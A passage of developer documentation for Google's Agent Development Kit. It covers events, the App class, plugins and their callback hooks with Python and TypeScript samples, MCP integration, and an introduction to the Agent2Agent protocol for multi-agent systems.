author: `yield(&session.Event{Author: a.name, ...}, nil)` When constructing an `Event` in your custom agent logic, set the author, for example: `Event.builder().author(this.getAgentName()) // ... .build();` - **Semantic Content & Actions:** Use `event.content` for the core message/data (text, function call/response). Use `event.actions` specifically for signaling side effects (state/artifact deltas) or control flow (`transfer`, `escalate`, `skip_summarization`). - **Idempotency Awareness:** Understand that the `SessionService` is responsible for applying the state/artifact changes signaled in `event.actions`. While ADK services aim for consistency, consider potential downstream effects if your application logic re-processes events. - **Use `is_final_response()`:** Rely on this helper method in your application/UI layer to identify complete, user-facing text responses. Avoid manually replicating its logic. - **Leverage History:** The session's event list is your primary debugging tool. Examine the sequence of authors, content, and actions to trace execution and diagnose issues. - **Use Metadata:** Use `invocation_id` to correlate all events within a single user interaction. Use `event.id` to reference specific, unique occurrences. Treating events as structured messages with clear purposes for their content and actions is key to building, debugging, and managing complex agent behaviors in ADK. # Apps: workflow management class Supported in ADKPython v1.14.0 The ***App*** class is a top-level container for an entire Agent Development Kit (ADK) agent workflow. It is designed to manage the lifecycle, configuration, and state for a collection of agents grouped by a ***root agent***. The **App** class separates the concerns of an agent workflow's overall operational infrastructure from individual agents' task-oriented reasoning. Defining an ***App*** object in your ADK workflow is optional and changes how you organize your agent code and run your agents. From a practical perspective, you use the ***App*** class to configure the following features for your agent workflow: - [**Context caching**](/adk-docs/context/caching/) - [**Context compression**](/adk-docs/context/compaction/) - [**Agent resume**](/adk-docs/runtime/resume/) - [**Plugins**](/adk-docs/plugins/) This guide explains how to use the App class for configuring and managing your ADK agent workflows. ## Purpose of App Class The ***App*** class addresses several architectural issues that arise when building complex agentic systems: - **Centralized configuration:** Provides a single, centralized location for managing shared resources like API keys and database clients, avoiding the need to pass configuration down through every agent. - **Lifecycle management:** The ***App*** class includes ***on startup*** and ***on shutdown*** hooks, which allow for reliable management of persistent resources such as database connection pools or in-memory caches that need to exist across multiple invocations. - **State scope:** It defines an explicit boundary for application-level state with an `app:*` prefix making the scope and lifetime of this state clear to developers. - **Unit of deployment:** The ***App*** concept establishes a formal *deployable unit*, simplifying versioning, testing, and serving of agentic applications. ## Define an App object The ***App*** class is used as the primary container of your agent workflow and contains the root agent of the project. The ***root agent*** is the container for the primary controller agent and any additional sub-agents. ### Define app with root agent Create a ***root agent*** for your workflow by creating a subclass from the ***Agent*** base class. Then define an ***App*** object and configure it with the ***root agent*** object and optional features, as shown in the following sample code: agent.py ```python from google.adk.agents.llm_agent import Agent from google.adk.apps import App root_agent = Agent( model='gemini-2.5-flash', name='greeter_agent', description='An agent that provides a friendly greeting.', instruction='Reply with Hello, World!', ) app = App( name="agents", root_agent=root_agent, # Optionally include App-level features: # plugins, context_cache_config, resumability_config ) ``` Recommended: Use `app` variable name In your agent project code, set your ***App*** object to the variable name `app` so it is compatible with the ADK command line interface runner tools. ### Run your App agent You can use the ***Runner*** class to run your agent workflow using the `app` parameter, as shown in the following code sample: main.py ```python import asyncio from dotenv import load_dotenv from google.adk.runners import InMemoryRunner from agent import app # import code from agent.py load_dotenv() # load API keys and settings # Set a Runner using the imported application object runner = InMemoryRunner(app=app) async def main(): try: # run_debug() requires ADK Python 1.18 or higher: response = await runner.run_debug("Hello there!") except Exception as e: print(f"An error occurred during agent execution: {e}") if __name__ == "__main__": asyncio.run(main()) ``` Version requirement for `Runner.run_debug()` The `Runner.run_debug()` command requires ADK Python v1.18.0 or higher. You can also use `Runner.run()`, which requires more setup code. For more details, see the Run your App agent with the `main.py` code using the following command: ```console python main.py ``` ## Next steps For a more complete sample code implementation, see the [Hello World App](https://github.com/google/adk-python/tree/main/contributing/samples/hello_world_app) code example. # Plugins Supported in ADKPython v1.7.0 A Plugin in Agent Development Kit (ADK) is a custom code module that can be executed at various stages of an agent workflow lifecycle using callback hooks. You use Plugins for functionality that is applicable across your agent workflow. Some typical applications of Plugins are as follows: - **Logging and tracing**: Create detailed logs of agent, tool, and generative AI model activity for debugging and performance analysis. - **Policy enforcement**: Implement security guardrails, such as a function that checks if users are authorized to use a specific tool and prevent its execution if they do not have permission. - **Monitoring and metrics**: Collect and export metrics on token usage, execution times, and invocation counts to monitoring systems such as Prometheus or [Google Cloud Observability](https://cloud.google.com/stackdriver/docs) (formerly Stackdriver). - **Response caching**: Check if a request has been made before, so you can return a cached response, skipping expensive or time consuming AI model or tool calls. - **Request or response modification**: Dynamically add information to AI model prompts or standardize tool output responses. Tip: Use Plugins for safety features When implementing security guardrails and policies, use ADK Plugins for better modularity and flexibility than Callbacks. For more details, see [Callbacks and Plugins for Security Guardrails](/adk-docs/safety/#callbacks-and-plugins-for-security-guardrails). Tip: ADK Integrations For a list of pre-built plugins and other integrations for ADK, see [Tools and Integrations](/adk-docs/integrations/). ## How do Plugins work? An ADK Plugin extends the `BasePlugin` class and contains one or more `callback` methods, indicating where in the agent lifecycle the Plugin should be executed. You integrate Plugins into an agent by registering them in your agent's `Runner` class. For more information on how and where you can trigger Plugins in your agent application, see [Plugin callback hooks](#plugin-callback-hooks). Plugin functionality builds on [Callbacks](https://google.github.io/adk-docs/callbacks/index.md), which is a key design element of the ADK's extensible architecture. While a typical Agent Callback is configured on a *single agent, a single tool* for a *specific task*, a Plugin is registered *once* on the `Runner` and its callbacks apply *globally* to every agent, tool, and LLM call managed by that runner. Plugins let you package related callback functions together to be used across a workflow. This makes Plugins an ideal solution for implementing features that cut across your entire agent application. ## Prebuilt Plugins ADK includes several plugins that you can add to your agent workflows immediately: - [**Reflect and Retry Tools**](/adk-docs/plugins/reflect-and-retry/): Tracks tool failures and intelligently retries tool requests. - [**BigQuery Analytics**](/adk-docs/observability/bigquery-agent-analytics/): Enables agent logging and analysis with BigQuery. - [**Context Filter**](https://github.com/google/adk-python/blob/main/src/google/adk/plugins/context_filter_plugin.py): Filters the generative AI context to reduce its size. - [**Global Instruction**](https://github.com/google/adk-python/blob/main/src/google/adk/plugins/global_instruction_plugin.py): Plugin that provides global instructions functionality at the App level. - [**Save Files as Artifacts**](https://github.com/google/adk-python/blob/main/src/google/adk/plugins/save_files_as_artifacts_plugin.py): Saves files included in user messages as Artifacts. - [**Logging**](https://github.com/google/adk-python/blame/main/src/google/adk/plugins/logging_plugin.py): Log important information at each agent workflow callback point. ## Define and register Plugins This section explains how to define Plugin classes and register them as part of your agent workflow. For a complete code example, see [Plugin Basic](https://github.com/google/adk-python/tree/main/contributing/samples/plugin_basic) in the repository. ### Create Plugin class Start by extending the `BasePlugin` class and add one or more `callback` methods, as shown in the following code example: count_plugin.py ```py from google.adk.agents.base_agent import BaseAgent from google.adk.agents.callback_context import CallbackContext from google.adk.models.llm_request import LlmRequest from google.adk.plugins.base_plugin import BasePlugin class CountInvocationPlugin(BasePlugin): """A custom plugin that counts agent and tool invocations.""" def __init__(self) -> None: """Initialize the plugin with counters.""" super().__init__(name="count_invocation") self.agent_count: int = 0 self.tool_count: int = 0 self.llm_request_count: int = 0 async def before_agent_callback( self, *, agent: BaseAgent, callback_context: CallbackContext ) -> None: """Count agent runs.""" self.agent_count += 1 print(f"[Plugin] Agent run count: {self.agent_count}") async def before_model_callback( self, *, callback_context: CallbackContext, llm_request: LlmRequest ) -> None: """Count LLM requests.""" self.llm_request_count += 1 print(f"[Plugin] LLM request count: {self.llm_request_count}") ``` count_plugin.ts ```typescript import { BaseAgent, BasePlugin, CallbackContext } from "@google/adk"; import type { LlmRequest, LlmResponse } from "@google/adk"; import type { Content } from "@google/genai"; /** * A custom plugin that counts agent and tool invocations. */ export class CountInvocationPlugin extends BasePlugin { public agentCount = 0; public toolCount = 0; public llmRequestCount = 0; constructor() { super("count_invocation"); } /** * Count agent runs. */ async beforeAgentCallback( agent: BaseAgent, callbackContext: CallbackContext ): Promise { this.agentCount++; console.log(`[Plugin] Agent run count: ${this.agentCount}`); return undefined; } /** * Count LLM requests. */ async beforeModelCallback( callbackContext: CallbackContext, llmRequest: LlmRequest ): Promise { this.llmRequestCount++; console.log(`[Plugin] LLM request count: ${this.llmRequestCount}`); return undefined; } } ``` This example code implements callbacks for `before_agent_callback` and `before_model_callback` to count execution of these tasks during the lifecycle of the agent. ### Register Plugin class Integrate your Plugin class by registering it during your agent initialization as part of your `Runner` class, using the `plugins` parameter. You can specify multiple Plugins with this parameter. The following code example shows how to register the `CountInvocationPlugin` plugin defined in the previous section with a simple ADK agent. ```py from google.adk.runners import InMemoryRunner from google.adk import Agent from google.adk.tools.tool_context import ToolContext from google.genai import types import asyncio # Import the plugin. from .count_plugin import CountInvocationPlugin async def hello_world(tool_context: ToolContext, query: str): print(f'Hello world: query is [{query}]') root_agent = Agent( model='gemini-2.0-flash', name='hello_world', description='Prints hello world with user query.', instruction="""Use hello_world tool to print hello world and user query. """, tools=[hello_world], ) async def main(): """Main entry point for the agent.""" prompt = 'hello world' runner = InMemoryRunner( agent=root_agent, app_name='test_app_with_plugin', # Add your plugin here. You can add multiple plugins. plugins=[CountInvocationPlugin()], ) # The rest is the same as starting a regular ADK runner. session = await runner.session_service.create_session( user_id='user', app_name='test_app_with_plugin', ) async for event in runner.run_async( user_id='user', session_id=session.id, new_message=types.Content( role='user', parts=[types.Part.from_text(text=prompt)] ) ): print(f'** Got event from {event.author}') if __name__ == "__main__": asyncio.run(main()) ``` ```typescript import { InMemoryRunner, LlmAgent, FunctionTool } from "@google/adk"; import type { Content } from "@google/genai"; import { z } from "zod"; // Import the plugin. import { CountInvocationPlugin } from "./count_plugin.ts"; const HelloWorldInput = z.object({ query: z.string().describe("The query string to print."), }); async function helloWorld({ query }: z.infer): Promise<{ result: string }> { const output = `Hello world: query is [${query}]`; console.log(output); // Tools should return a string or JSON-compatible object return { result: output }; } const helloWorldTool = new FunctionTool({ name: "hello_world", description: "Prints hello world with user query.", parameters: HelloWorldInput, execute: helloWorld, }); const rootAgent = new LlmAgent({ model: "gemini-2.5-flash", // Preserved from your Python code name: "hello_world", description: "Prints hello world with user query.", instruction: `Use hello_world tool to print hello world and user query.`, tools: [helloWorldTool], }); /** * Main entry point for the agent. */ async function main(): Promise { const prompt = "hello world"; const runner = new InMemoryRunner({ agent: rootAgent, appName: "test_app_with_plugin", // Add your plugin here. You can add multiple plugins. plugins: [new CountInvocationPlugin()], }); // The rest is the same as starting a regular ADK runner. const session = await runner.sessionService.createSession({ userId: "user", appName: "test_app_with_plugin", }); // runAsync returns an async iterable stream in TypeScript const runStream = runner.runAsync({ userId: "user", sessionId: session.id, newMessage: { role: "user", parts: [{ text: prompt }], }, }); // Use 'for await...of' to loop through the async stream for await (const event of runStream) { console.log(`** Got event from ${event.author}`); } } main(); ``` ### Run the agent with the Plugin Run the plugin as you typically would. The following shows how to run the command line: ```sh python3 -m path.to.main.py ``` ```sh npx ts-node path.to.main.ts ``` The output of this previously described agent should look similar to the following: ```text [Plugin] Agent run count: 1 [Plugin] LLM request count: 1 ** Got event from hello_world Hello world: query is [hello world] ** Got event from hello_world [Plugin] LLM request count: 2 ** Got event from hello_world ``` For more information on running ADK agents, see the [Quickstart](/adk-docs/get-started/quickstart/#run-your-agent) guide. ## Build workflows with Plugins Plugin callback hooks are a mechanism for implementing logic that intercepts, modifies, and even controls the agent's execution lifecycle. Each hook is a specific method in your Plugin class that you can implement to run code at a key moment. You have a choice between two modes of operation based on your hook's return value: - **To Observe:** Implement a hook with no return value (`None`). This approach is for tasks such as logging or collecting metrics, as it allows the agent's workflow to proceed to the next step without interruption. For example, you could use `after_tool_callback` in a Plugin to log every tool's result for debugging. - **To Intervene:** Implement a hook and return a value. This approach short-circuits the workflow. The `Runner` halts processing, skips any subsequent plugins and the original intended action, like a Model call, and use a Plugin callback's return value as the result. A common use case is implementing `before_model_callback` to return a cached `LlmResponse`, preventing a redundant and costly API call. - **To Amend:** Implement a hook and modify the Context object. This approach allows you to modify the context data for the module to be executed without otherwise interrupting the execution of that module. For example, adding additional, standardized prompt text for Model object execution. **Caution:** Plugin callback functions have precedence over callbacks implemented at the object level. This behavior means that Any Plugin callbacks code is executed *before* any Agent, Model, or Tool objects callbacks are executed. Furthermore, if a Plugin-level agent callback returns any value, and not an empty (`None`) response, the Agent, Model, or Tool-level callback is *not executed* (skipped). The Plugin design establishes a hierarchy of code execution and separates global concerns from local agent logic. A Plugin is the stateful *module* you build, such as `PerformanceMonitoringPlugin`, while the callback hooks are the specific *functions* within that module that get executed. This architecture differs fundamentally from standard Agent Callbacks in these critical ways: - **Scope:** Plugin hooks are *global*. You register a Plugin once on the `Runner`, and its hooks apply universally to every Agent, Model, and Tool it manages. In contrast, Agent Callbacks are *local*, configured individually on a specific agent instance. - **Execution Order:** Plugins have *precedence*. For any given event, the Plugin hooks always run before any corresponding Agent Callback. This system behavior makes Plugins the correct architectural choice for implementing cross-cutting features like security policies, universal caching, and consistent logging across your entire application. ### Agent Callbacks and Plugins As mentioned in the previous section, there are some functional similarities between Plugins and Agent Callbacks. The following table compares the differences between Plugins and Agent Callbacks in more detail. | | **Plugins** | **Agent Callbacks** | | -------------------- | --------------------------------------------------------------------- | ---------------------------------------------------------------------------- | | **Scope** | **Global**: Apply to all agents/tools/LLMs in the `Runner`. | **Local**: Apply only to the specific agent instance they are configured on. | | **Primary Use Case** | **Horizontal Features**: Logging, policy, monitoring, global caching. | **Specific Agent Logic**: Modifying the behavior or state of a single agent. | | **Configuration** | Configure once on the `Runner`. | Configure individually on each `BaseAgent` instance. | | **Execution Order** | Plugin callbacks run **before** Agent Callbacks. | Agent callbacks run **after** Plugin callbacks. | ## Plugin callback hooks You define when a Plugin is called with the callback functions to define in your Plugin class. Callbacks are available when a user message is received, before and after an `Runner`, `Agent`, `Model`, or `Tool` is called, for `Events`, and when a `Model`, or `Tool` error occurs. These callbacks include, and take precedence over, the any callbacks defined within your Agent, Model, and Tool classes. The following diagram illustrates callback points where you can attach and run Plugin functionality during your agents workflow: **Figure 1.** Diagram of ADK agent workflow with Plugin callback hook locations. The following sections describe the available callback hooks for Plugins in more detail. - [User Message callbacks](#user-message-callbacks) - [Runner start callbacks](#runner-start-callbacks) - [Agent execution callbacks](#agent-execution-callbacks) - [Model callbacks](#model-callbacks) - [Tool callbacks](#tool-callbacks) - [Runner end callbacks](#runner-end-callbacks) ### User Message callbacks *A User Message c*allback (`on_user_message_callback`) happens when a user sends a message. The `on_user_message_callback` is the very first hook to run, giving you a chance to inspect or modify the initial input.\\ - **When It Runs:** This callback happens immediately after `runner.run()`, before any other processing. - **Purpose:** The first opportunity to inspect or modify the user's raw input. - **Flow Control:** Returns a `types.Content` object to **replace** the user's original message. The following code example shows the basic syntax of this callback: ```py async def on_user_message_callback( self, *, invocation_context: InvocationContext, user_message: types.Content, ) -> Optional[types.Content]: ``` ```typescript async onUserMessageCallback( invocationContext: InvocationContext, user_message: Content ): Promise { // Your implementation here } ``` ### Runner start callbacks A *Runner start* callback (`before_run_callback`) happens when the `Runner` object takes the potentially modified user message and prepares for execution. The `before_run_callback` fires here, allowing for global setup before any agent logic begins. - **When It Runs:** Immediately after `runner.run()` is called, before any other processing. - **Purpose:** The first opportunity to inspect or modify the user's raw input. - **Flow Control:** Return a `types.Content` object to **replace** the user's original message. The following code example shows the basic syntax of this callback: ```py async def before_run_callback( self, *, invocation_context: InvocationContext ) -> Optional[types.Content]: ``` ```typescript async beforeRunCallback(invocationContext: InvocationContext): Promise { // Your implementation here } ``` ### Agent execution callbacks *Agent execution* callbacks (`before_agent`, `after_agent`) happen when a `Runner` object invokes an agent. The `before_agent_callback` runs immediately before the agent's main work begins. The main work encompasses the agent's entire process for handling the request, which could involve calling models or tools. After the agent has finished all its steps and prepared a result, the `after_agent_callback` runs. **Caution:** Plugins that implement these callbacks are executed *before* the Agent-level callbacks are executed. Furthermore, if a Plugin-level agent callback returns anything other than a `None` or null response, the Agent-level callback is *not executed* (skipped). For more information about Agent callbacks defined as part of an Agent object, see [Types of Callbacks](https://google.github.io/adk-docs/callbacks/types-of-callbacks/#agent-lifecycle-callbacks). ### Model callbacks Model callbacks **(`before_model`, `after_model`, `on_model_error`)** happen before and after a Model object executes. The Plugins feature also supports a callback in the event of an error, as detailed below: - If an agent needs to call an AI model, `before_model_callback` runs first. - If the model call is successful, `after_model_callback` runs next. - If the model call fails with an exception, the `on_model_error_callback` is triggered instead, allowing for graceful recovery. **Caution:** Plugins that implement the **`before_model`** and `**after_model` **callback methods are executed* before* the Model-level callbacks are executed. Furthermore, if a Plugin-level model callback returns anything other than a `None` or null response, the Model-level callback is *not executed* (skipped). #### Model on error callback details The on error callback for Model objects is only supported by the Plugins feature works as follows: - **When It Runs:** When an exception is raised during the model call. - **Common Use Cases:** Graceful error handling, logging the specific error, or returning a fallback response, such as "The AI service is currently unavailable." - **Flow Control:** - Returns an `LlmResponse` object to **suppress the exception** and provide a fallback result. - Returns `None` to allow the original exception to be raised. **Note**: If the execution of the Model object returns a `LlmResponse`, the system resumes the execution flow, and `after_model_callback` will be triggered normally.\*\*\*\* The following code example shows the basic syntax of this callback: ```py async def on_model_error_callback( self, *, callback_context: CallbackContext, llm_request: LlmRequest, error: Exception, ) -> Optional[LlmResponse]: ``` ```typescript async onModelErrorCallback( callbackContext: CallbackContext, llmRequest: LlmRequest, error: Error ): Promise { // Your implementation here } ``` ### Tool callbacks Tool callbacks **(`before_tool`, `after_tool`, `on_tool_error`)** for Plugins happen before or after the execution of a tool, or when an error occurs. The Plugins feature also supports a callback in the event of an error, as detailed below:\\ - When an agent executes a Tool, `before_tool_callback` runs first. - If the tool executes successfully, `after_tool_callback` runs next. - If the tool raises an exception, the `on_tool_error_callback` is triggered instead, giving you a chance to handle the failure. If `on_tool_error_callback` returns a dict, `after_tool_callback` will be triggered normally. **Caution:** Plugins that implement these callbacks are executed *before* the Tool-level callbacks are executed. Furthermore, if a Plugin-level tool callback returns anything other than a `None` or null response, the Tool-level callback is *not executed* (skipped). #### Tool on error callback details The on error callback for Tool objects is only supported by the Plugins feature works as follows: - **When It Runs:** When an exception is raised during the execution of a tool's `run` method. - **Purpose:** Catching specific tool exceptions (like `APIError`), logging the failure, and providing a user-friendly error message back to the LLM. - **Flow Control:** Return a `dict` to **suppress the exception**, provide a fallback result. Return `None` to allow the original exception to be raised. **Note**: By returning a `dict`, this resumes the execution flow, and `after_tool_callback` will be triggered normally. The following code example shows the basic syntax of this callback: ```py async def on_tool_error_callback( self, *, tool: BaseTool, tool_args: dict[str, Any], tool_context: ToolContext, error: Exception, ) -> Optional[dict]: ``` ```typescript async onToolErrorCallback( tool: BaseTool, toolArgs: { [key: string]: any }, toolContext: ToolContext, error: Error ): Promise<{ [key:string]: any } | undefined> { // Your implementation here } ``` ### Event callbacks An *Event callback* (`on_event_callback`) happens when an agent produces outputs such as a text response or a tool call result, it yields them as `Event` objects. The `on_event_callback` fires for each event, allowing you to modify it before it's streamed to the client. - **When It Runs:** After an agent yields an `Event` but before it's sent to the user. An agent's run may produce multiple events. - **Purpose:** Useful for modifying or enriching events (e.g., adding metadata) or for triggering side effects based on specific events. - **Flow Control:** Return an `Event` object to **replace** the original event. The following code example shows the basic syntax of this callback: ```py async def on_event_callback( self, *, invocation_context: InvocationContext, event: Event ) -> Optional[Event]: ``` ```typescript async onEventCallback( invocationContext: InvocationContext, event: Event ): Promise { // Your implementation here } ``` ### Runner end callbacks The *Runner end* callback **(`after_run_callback`)** happens when the agent has finished its entire process and all events have been handled, the `Runner` completes its run. The `after_run_callback` is the final hook, perfect for cleanup and final reporting. - **When It Runs:** After the `Runner` fully completes the execution of a request. - **Purpose:** Ideal for global cleanup tasks, such as closing connections or finalizing logs and metrics data. - **Flow Control:** This callback is for teardown only and cannot alter the final result. The following code example shows the basic syntax of this callback: ```py async def after_run_callback( self, *, invocation_context: InvocationContext ) -> Optional[None]: ``` ```typescript async afterRunCallback(invocationContext: InvocationContext): Promise { // Your implementation here } ``` ## Next steps Check out these resources for developing and applying Plugins to your ADK projects: - For more ADK Plugin code examples, see the [ADK Python repository](https://github.com/google/adk-python/tree/main/src/google/adk/plugins). - For information on applying Plugins for security purposes, see [Callbacks and Plugins for Security Guardrails](/adk-docs/safety/#callbacks-and-plugins-for-security-guardrails). # Model Context Protocol (MCP) Supported in ADKPythonTypeScriptGoJava The [Model Context Protocol (MCP)](https://modelcontextprotocol.io/introduction) is an open standard designed to standardize how Large Language Models (LLMs) like Gemini and Claude communicate with external applications, data sources, and tools. Think of it as a universal connection mechanism that simplifies how LLMs obtain context, execute actions, and interact with various systems. MCP tools for ADK For a list of pre-built MCP tools for ADK, see [Tools and Integrations](/adk-docs/integrations/?topic=mcp). ## How does MCP work? MCP follows a client-server architecture, defining how data (resources), interactive templates (prompts), and actionable functions (tools) are exposed by an MCP server and consumed by an MCP client (which could be an LLM host application or an AI agent). ## MCP Tools in ADK ADK helps you both use and consume MCP tools in your agents, whether you're trying to build a tool to call an MCP service, or exposing an MCP server for other developers or agents to interact with your tools. See [Tools and Integrations](/adk-docs/integrations/) for pre-built MCP tools you can use in your agents. Refer to the [MCP Tools documentation](/adk-docs/tools-custom/mcp-tools/) for code samples and design patterns that help you use ADK together with MCP servers, including: - **Using Existing MCP Servers within ADK**: An ADK agent can act as an MCP client and use tools provided by external MCP servers. - **Exposing ADK Tools via an MCP Server**: How to build an MCP server that wraps ADK tools, making them accessible to any MCP client. ## ADK Agent and FastMCP server ADK uses [FastMCP](https://github.com/jlowin/fastmcp) to handle all the complex MCP protocol details and server management, so you can focus on building great tools. It's designed to be high-level and Pythonic; in most cases, decorating a function is all you need. Refer to the [MCP Tools](/adk-docs/tools-custom/mcp-tools/) documentation on how you can use ADK together with the FastMCP server running on Cloud Run. ## MCP Servers for Google Cloud Genmedia [MCP Tools for Genmedia Services](https://github.com/GoogleCloudPlatform/vertex-ai-creative-studio/tree/main/experiments/mcp-genmedia) is a set of open-source MCP servers that enable you to integrate Google Cloud generative media services—such as Imagen, Veo, Chirp 3 HD voices, and Lyria—into your AI applications. Agent Development Kit (ADK) and [Genkit](https://genkit.dev/) provide built-in support for these MCP tools, allowing your AI agents to effectively orchestrate generative media workflows. For implementation guidance, refer to the [ADK example agent](https://github.com/GoogleCloudPlatform/vertex-ai-creative-studio/tree/main/experiments/mcp-genmedia/sample-agents/adk) and the [Genkit example](https://github.com/GoogleCloudPlatform/vertex-ai-creative-studio/tree/main/experiments/mcp-genmedia/sample-agents/genkit). # ADK with Agent2Agent (A2A) Protocol Supported in ADKPythonGoExperimental With Agent Development Kit (ADK), you can build complex multi-agent systems where different agents need to collaborate and interact using [Agent2Agent (A2A) Protocol](https://a2a-protocol.org/)! This section provides a comprehensive guide to building powerful multi-agent systems where agents can communicate and collaborate securely and efficiently. Navigate through the guides below to learn about ADK's A2A capabilities: **[Introduction to A2A](https://google.github.io/adk-docs/a2a/intro/index.md)** Start here to learn the fundamentals of A2A by building a multi-agent system with a root agent, a local sub-agent, and a remote A2A agent. The following guides cover how do I expose your agent so that other agents can use it via the A2A protocol: - **[A2A Quickstart (Exposing) for Python](https://google.github.io/adk-docs/a2a/quickstart-exposing/index.md)** - **[A2A Quickstart (Exposing) for Go](https://google.github.io/adk-docs/a2a/quickstart-exposing-go/index.md)** These guides show you how to allow your agent to use another, remote agent using A2A protocol: - **[A2A Quickstart (Consuming) for Python](https://google.github.io/adk-docs/a2a/quickstart-consuming/index.md)** - **[A2A Quickstart (Consuming) for Go](https://google.github.io/adk-docs/a2a/quickstart-consuming-go/index.md)** [**Official Website for Agent2Agent (A2A) Protocol**](https://a2a-protocol.org/) The official website for A2A Protocol. # Introduction to A2A As you build more complex agentic systems, you will find that a single agent is often not enough. You will want to create specialized agents that can collaborate to solve a problem. The [**Agent2Agent (A2A) Protocol**](https://a2a-protocol.org) is the standard that allows these agents to communicate with each other. ## When to Use A2A vs. Local Sub-Agents - **Local Sub-Agents:** These are agents that run *within the same application process* as your main agent. They are like internal modules or libraries, used to organize your code into logical, reusable components. Communication between a main agent and its local sub-agents is very fast because it happens directly in memory, without network overhead. - **Remote Agents (A2A):** These are independent agents that run as separate services, communicating over a network. A2A defines the standard protocol for this communication. Consider using **A2A** when: - The agent you need to talk to is a **separate, standalone service** (e.g., a specialized financial modeling agent). - The agent is maintained by a **different team or organization**. - You need to connect agents written in **different programming languages or agent frameworks**. - You want to enforce a **strong, formal contract** (the A2A protocol) between your system's components. ### When to Use A2A: Concrete Examples - **Integrating with a Third-Party Service:** Your main agent needs to get real-time stock prices from an external financial data provider. This provider exposes its data through an A2A-compatible agent. - **Microservices Architecture:** You have a large system broken down into smaller, independent services (e.g., an Order Processing Agent, an Inventory Management Agent, a Shipping Agent). A2A is ideal for these services to communicate with each other across network boundaries. - **Cross-Language Communication:** Your core business logic is in a Python agent, but you have a legacy system or a specialized component written in Java that you want to integrate as an agent. A2A provides the standardized communication layer. - **Formal API Enforcement:** You are building a platform where different teams contribute agents, and you need a strict contract for how these agents interact to ensure compatibility and stability. ### When NOT to Use A2A: Concrete Examples (Prefer Local Sub-Agents) - **Internal Code Organization:** You are breaking down a complex task within a single agent into smaller, manageable functions or modules (e.g., a `DataValidator` sub-agent that cleans input data before processing). These are best handled as local sub-agents for performance and simplicity. - **Performance-Critical Internal Operations:** A sub-agent is responsible for a high-frequency, low-latency operation that is tightly coupled with the main agent's execution (e.g., a `RealTimeAnalytics` sub-agent that processes data streams within the same application). - **Shared Memory/Context:** When sub-agents need direct access to the main agent's internal state or shared memory for efficiency, A2A's network overhead and serialization/deserialization would be counterproductive. - **Simple Helper Functions:** For small, reusable pieces of logic that don't require independent deployment or complex state management, a simple function or class within the same agent is more appropriate than a separate A2A agent. ## The A2A Workflow in ADK: A Simplified View Agent Development Kit (ADK) simplifies the process of building and connecting agents using the A2A protocol. Here's a straightforward breakdown of how it works: 1. **Making an Agent Accessible (Exposing):** You start with an existing ADK agent that you want other agents to be able to interact with. The ADK provides a simple way to "expose" this agent, turning it into an **A2AServer**. This server acts as a public interface, allowing other agents to send requests to your agent over a network. Think of it like setting up a web server for your agent. 1. **Connecting to an Accessible Agent (Consuming):** In a separate agent (which could be running on the same machine or a different one), you'll use a special ADK component called `RemoteA2aAgent`. This `RemoteA2aAgent` acts as a client that knows how to communicate with the **A2AServer** you exposed earlier. It handles all the complexities of network communication, authentication, and data formatting behind the scenes. From your perspective as a developer, once you've set up this connection, interacting with the remote agent feels just like interacting with a local tool or function. The ADK abstracts away the network layer, making distributed agent systems as easy to work with as local ones. ## Visualizing the A2A Workflow To further clarify the A2A workflow, let's look at the "before and after" for both exposing and consuming agents, and then the combined system. ### Exposing an Agent **Before Exposing:** Your agent code runs as a standalone component, but in this scenario, you want to expose it so that other remote agents can interact with your agent. ```text +-------------------+ | Your Agent Code | | (Standalone) | +-------------------+ ``` **After Exposing:** Your agent code is integrated with an `A2AServer` (an ADK component), making it accessible over a network to other remote agents. ```text +-----------------+ | A2A Server | | (ADK Component) |<--------+ +-----------------+ | | | v | +-------------------+ | | Your Agent Code | | | (Now Accessible) | | +-------------------+ | | | (Network Communication) v +-----------------------------+ | Remote Agent(s) | | (Can now communicate) | +-----------------------------+ ``` ### Consuming an Agent **Before Consuming:** Your agent (referred to as the "Root Agent" in this context) is the application you are developing that needs to interact with a remote agent. Before consuming, it lacks the direct mechanism to do so. ```text +----------------------+ +-------------------------------------------------------------+ | Root Agent | | Remote Agent | | (Your existing code) | | (External Service that you want your Root Agent to talk to) | +----------------------+ +-------------------------------------------------------------+ ``` **After Consuming:** Your Root Agent uses a `RemoteA2aAgent` (an ADK component that acts as a client-side proxy for the remote agent) to establish communication with the remote agent. ```text +----------------------+ +-----------------------------------+ | Root Agent | | RemoteA2aAgent | | (Your existing code) |<------->| (ADK Client Proxy) | +----------------------+ | | | +-----------------------------+ | | | Remote Agent | | | | (External Service) | | | +-----------------------------+ | +-----------------------------------+ (Now talks to remote agent via RemoteA2aAgent) ``` ### Final System (Combined View) This diagram shows how the consuming and exposing parts connect to form a complete A2A system. ```text Consuming Side: +----------------------+ +-----------------------------------+ | Root Agent | | RemoteA2aAgent | | (Your existing code) |<------->| (ADK Client Proxy) | +----------------------+ | | | +-----------------------------+ | | | Remote Agent | | | | (External Service) | | | +-----------------------------+ | +-----------------------------------+ | | (Network Communication) v Exposing Side: +-----------------+ | A2A Server | | (ADK Component) | +-----------------+ | v +-------------------+ | Your Agent Code | | (Exposed Service) | +-------------------+ ``` ## Concrete Use Case: Customer Service and Product Catalog Agents Let's consider a practical example: a **Customer Service Agent** that needs to retrieve product information from a separate **Product Catalog Agent**. ### Before A2A Initially, your Customer Service Agent might not have a direct, standardized way to query the Product Catalog Agent, especially if it's a separate service or managed by a different team. ```text +-------------------------+ +--------------------------+ | Customer Service Agent | | Product Catalog Agent | | (Needs Product Info) | | (Contains Product Data) | +-------------------------+ +--------------------------+ (No direct, standardized communication) ``` ### After A2A By using the A2A Protocol, the Product Catalog Agent can expose its functionality as an A2A service. Your Customer Service Agent can then easily consume this service using ADK's `RemoteA2aAgent`. ```text +-------------------------+ +-----------------------------------+ | Customer Service Agent | | RemoteA2aAgent | | (Your Root Agent) |<------->| (ADK Client Proxy) | +-------------------------+ | | | +-----------------------------+ | | | Product Catalog Agent | | | | (External Service) | | | +-----------------------------+ | +-----------------------------------+ | | (Network Communication) v +-----------------+ | A2A Server | | (ADK Component) | +-----------------+ | v +------------------------+ | Product Catalog Agent | | (Exposed Service) | +------------------------+ ``` In this setup, first, the Product Catalog Agent needs to be exposed via an A2A Server. Then, the Customer Service Agent can simply call methods on the `RemoteA2aAgent` as if it were a tool, and the ADK handles all the underlying communication to the Product Catalog Agent. This allows for clear separation of concerns and easy integration of specialized agents. ## Next Steps Now that you understand the "why" of A2A, let's dive into the "how." - **Continue to the next guide:** [Quickstart: Exposing Your Agent](https://google.github.io/adk-docs/a2a/quickstart-exposing/index.md) # Quickstart: 